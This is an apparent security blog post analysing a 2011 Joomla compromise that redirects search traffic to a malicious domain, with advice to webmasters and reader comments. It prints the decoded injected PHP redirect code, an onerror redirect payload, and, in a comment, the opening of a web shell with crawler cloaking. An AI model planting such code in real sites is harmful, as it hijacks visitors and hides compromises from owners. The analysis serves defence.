msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Ciscotred .cz .cc – Joomla Hack

   08 Aug 11   Filed in Short Attack Reviews

During the last few days I’ve noticed an increased number of websites that redirect search traffic to ciscotred .cz .cc. The typical Unmask Parasites report looks like this:

ciscotred .cz.cc redirect detected


The attack mostly affects websites that use a very old version of Joomla (usually 1.5), so I suspect that hackers use some Joomla vulnerability (still need to see access logs of the hacked sites to be able to tell where exactly the security hole is).

The malicious PHP code is injected into configuration files:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQo..skipped...Ck7DQoJfQ0KfQ0KfQ=="));

decoded:

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($
referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: hxxp://ciscotred .cz .cc/");
exit();
}}}

The code looks like a revised version of the code that redirected search traffic to various .pl (e.g. fgnfdfthrv.bee .pl, gberbhjerfds.osa .pl, newwave.orge .pl, antispyche.bij .pl, gberbhjerfds.osa .pl) during the last couple of years.

The code itself checks whether a visitor comes from major search engines and redirects to ciscotred .cz .cc. To prevent redirect detection by webmasters and security researches, it also checks whether a visitor used the inurl search operator or checked cached versions of web pages.

At this time I only see hacked Joomla sites, but the redirect code is quite universal and can be injected in to any PHP website.

Update (August 9, 2011): I was right comparing this attack with the former .pl attack. Today the malicious code has changed and now it redirects to hxxp://www.liaekim .com .br/site/includes/js/wz_uye.html, which includes the following code

<img src="tick1.jpg" onerror="location.href='hxxp://trwqfhxf .bee .pl/?q=videos'">

To webmasters

Joomla 1.5 is too old and not safe to use. Please upgrade to the latest version of Joomla (currently 1.7 — by the way, it has a one-click upgrade feature now!)

Password protect the admin directory of Joomla (I mean the directory, not the Joomla itself, which is already password-protected). Consider changing all site passwords.

Regularly check integrity of files on server. Scan them for suspicious code like “eval(base64_decode” — this is the most commonly used string in obfuscated malicious PHP code.

##
Let me know if you have any information about the security hole used in this attack.

Related posts:

Reader's Comments (5)

  1. |

    I have been infected, after searching i found an img.ph in to the images directorio of my joomla site.

    It has an obfusctated code which start:
    (still i do not know how was put there, but this has codes for searching many parts of the server that may have been compromied

    $auth_pass = “7b24afc8bc80e548d66c4e7ff72171c5″;
    $color = “#df5″;
    $default_action = ‘FilesMan’;
    $default_charset = ‘Windows-1251′;

    if( !empty($_SERVER['HTTP_USER_AGENT']) ) {
    $userAgents = array(“Google”, “Slurp”, “MSNBot”, “ia_archiver”, “Yandex”, “Rambler”);
    foreach($userAgents as $agent)
    if( strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false ) {
    header(‘HTTP/1.0 404 Not Found’);
    exit;
    }
    }
    @session_start();
    @error_reporting(0);
    @ini_set(‘error_log’,NULL);
    @ini_set(‘log_errors’,0);
    @ini_set(‘max_execution_time’,0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);
    @define(‘VERSION’, ’2.3′);

  2. |

    Thank you for your website and information. I found the following similar code on my website:

    I also sincerely appreciate Javier’s reply to this post as it directed me to the same file on my server to eliminate it.

    Thanks for the help.

    Ben

  3. |

    I’m getting the same problem. But I clean the code and then in 2 days the same story, I can’t find how they can do that becouse I have some different websites, One is in J 1.5 last version other in J 2.5 last version and other one is in J 1.7 last version.

    IN ONE NIGHT THEY HACK ALL MY SITES, IS INCREDIBLE.

    I need help to solve this, and I don’t understand what is img.ph

    Can help me to fix this please?

    PD: Sorry for my english